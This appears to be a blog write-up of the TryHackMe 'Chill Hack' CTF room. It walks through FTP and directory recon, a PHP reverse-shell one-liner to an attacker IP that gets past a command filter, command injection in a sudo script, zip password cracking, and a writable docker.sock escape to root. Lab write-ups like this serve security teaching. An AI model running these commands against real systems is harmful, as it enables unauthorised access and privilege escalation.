Chill Hack(The Easy Way)

Today we will be solving Chill Hack Room of TryHackMe which is intermediate level CTF.So for this lets join the room and start the room .

Here we will start by scanning the room using nmap.

Command to be used:

sudo nmap -T4 -A ip_address

fig 1: nmap result

Here As we can see from the result anonymous login is allowed .so let's try to login as anonymous in FTP .
Command used:

ftp ip_address

fig 2: FTP Anonymous login

Once we get in as anonymous let's search for any flag or clues.
On searching, we get the note.txt file in the server. Now, let's download the note.txt file from our local machine.

Command used to download the file: get note.txt

fig 3: note.txt

After downloading the note.txt file to our local machine let's look into its content.

fig 4: Content of note

From the above hint, we get to that there are at least two users: Anurodh and Apaar and
There is someplace to put commands and there is some filtering on strings.
Now let's search for the place where we can enter commands. There is a good chance that there are some hidden directories so let's gobuster to search for directories.
Command used :

gobuster dir -u http:ip_address -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

fig 5: gobuster result

Here we get one interesting directory called /secret.
Let's loot into the secret directory and check whether we can find anything useful or not.

fig 6: command interface

BINGO!!! we get the command page. Now as mention above in note.txt there are some command filters.
Let's test which commands are filtered and which are unfiltered.

fig 7: Hacker Alert Page

Here we get the hacker to alter which means ls command is filtered so now let's try to execute another command.

fig 8: Acceptable filter

Here pwd command is not filtered.

Now, let's set the listener in the attacker machine using Netcat.
Command used:

nc -lnvp 4444
and enter reverses shell code into terminal by filtering it :

‘p’hp -r ‘$sock=fsockopen(“10.9.120.205”,1234);exec(“/bin/bash -i <&3 >&3 2>&3”);’

Here now we will get the reverse shell into the device.

Now once we get the reverse shell let's check which user we have got the shell. For this type of command whoami to check the user.

fig 9: Reverse Shell

Here we can see that we are www-data user.
Now let's start our search for privilege escalation for this at first let check:

sudo -l

fig 10 : sudo -l command

Here we can see that the user www-data can run the /home/apaar/.helpline.sh as apaar.
So before running the helpline.sh let's check its content using cat.

fig 11: Content of helpline.sh

Here by seeing the code we can see that it is vulnerable to command injection.So let's exploit it.
For this we have to run the helpline.sh as apaar using following command:
Enter the person whom you want to talk with: hero
Hello user! I am hero, Please enter your message:’ /bin/bash
python3-c ‘import pty;pty.spawn(“/bin/bash”)’

fig 12: Running helpline.sh

We successfully escalate our privilege to apaar. now let's go to apaar and check if there is any flag.

cd /home/apaar

Here we can see that there is a local.txt file .lets check its content.

fig 13: user flag

BINGO!! we successfully got a user flag.

Now our next target is to get root access for this let's search the server for any hint.
At first lets check /var/www directory.

Upon checking the files directory inside /var/www we get a interesting file name hacker.php .
Let's check its content.

fig 14: the content of hacker.php

Here we get the image source: images/hacker-with-laptop_23–2147985341.jpg
Now let's download the file in our local system and check whether it contains some hidden file or not using steghide.
For this let's run an HTTP server on the target machine and then download the file from our local machine.

fig 15: HTTP server on Target System

Now let's download the image file into our local machine using wget.

fig 16: image downloaded into local system

Once we download the file let's analyze the file using steghide.
command used:

steghide — extract -sf hacker-with-laptop_23–2147985341.jpg

fig 17: steghide

Here we get the backup.zip file from the image. Let's try to unzip the file.

fig 18: trying to unzip the file

Here the zip file is password protected. So let's use zip2john and john to crack the password.

Command to be used:

zip2john backup.zip > input_john.txt

john -w=/usr/share/wordliss/rockyou.txt input_john.txt

To see the hashed password.

john — show input_john.txt

fig 19: Zip Password

Here we get the password for the zip file which is pass1word.
Now let's unzip the file with the given password.

fig 20: Unzip Sucess

Here source_code.php file is extracted. now let's check the content of the file.

fig 21: Content of sourcecode.php

Here we get the bas64 encoded in if condition and from analyzing the code we can guess that it's the encoded password of Anurodh. Now let's try to decode the base64 using an online decoder.
Upon decoding, we get to know the password which is: !d0ntKn0wmYp@ssw0rd
Now lest try to ssh connect as anurodh.

fig 22: ssh anurodh

we successfully gain access to anurodh. Now let's download linpeas.sh into our target system through our local machine using wget and run it to find information for privilege escalation.

fig 23: Running HTTP server on the local machine
fig 24: Downloading linpeas.sh on the target machine

Once we download the linpeas.sh to our target system lets run it for searching privilege escalation points.

Command to be used :

chmod +x linpeas.sh

./linpeas.sh

fig 25: Output of linpeas

Here we can see that /var/run/docker.sock is writable with a link. Now, lets visit the link and search for docker on the webpage.
Here now let's the docker command mentioned in the webpage.
Command :

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash

Once we run the command we get unable to find ubuntu: latest locally.
So let's replace the ubuntu with a local docker image.
New command :

docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash

fig 26: Running docker command for privilege escalation

After running the docker command we successfully gain root privelege.

fig 27: Root privelege

Now let's go to the root directory and check for the flag.
Command :

cd /root
cat proof.txt

BINGO!!! we get the root flag.

fig 28: Root Flag.

Hence By the above-mentioned ways, we can gain both the flags.

(NOTE: You can skip privilege escalation of apaar and directly perform root privilege escalation to gain both flags but it is good practice to follow complete steps.)

References:

https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)

Data Engineer, Cybersecurity enthusiast , PLSQL, Data Analyst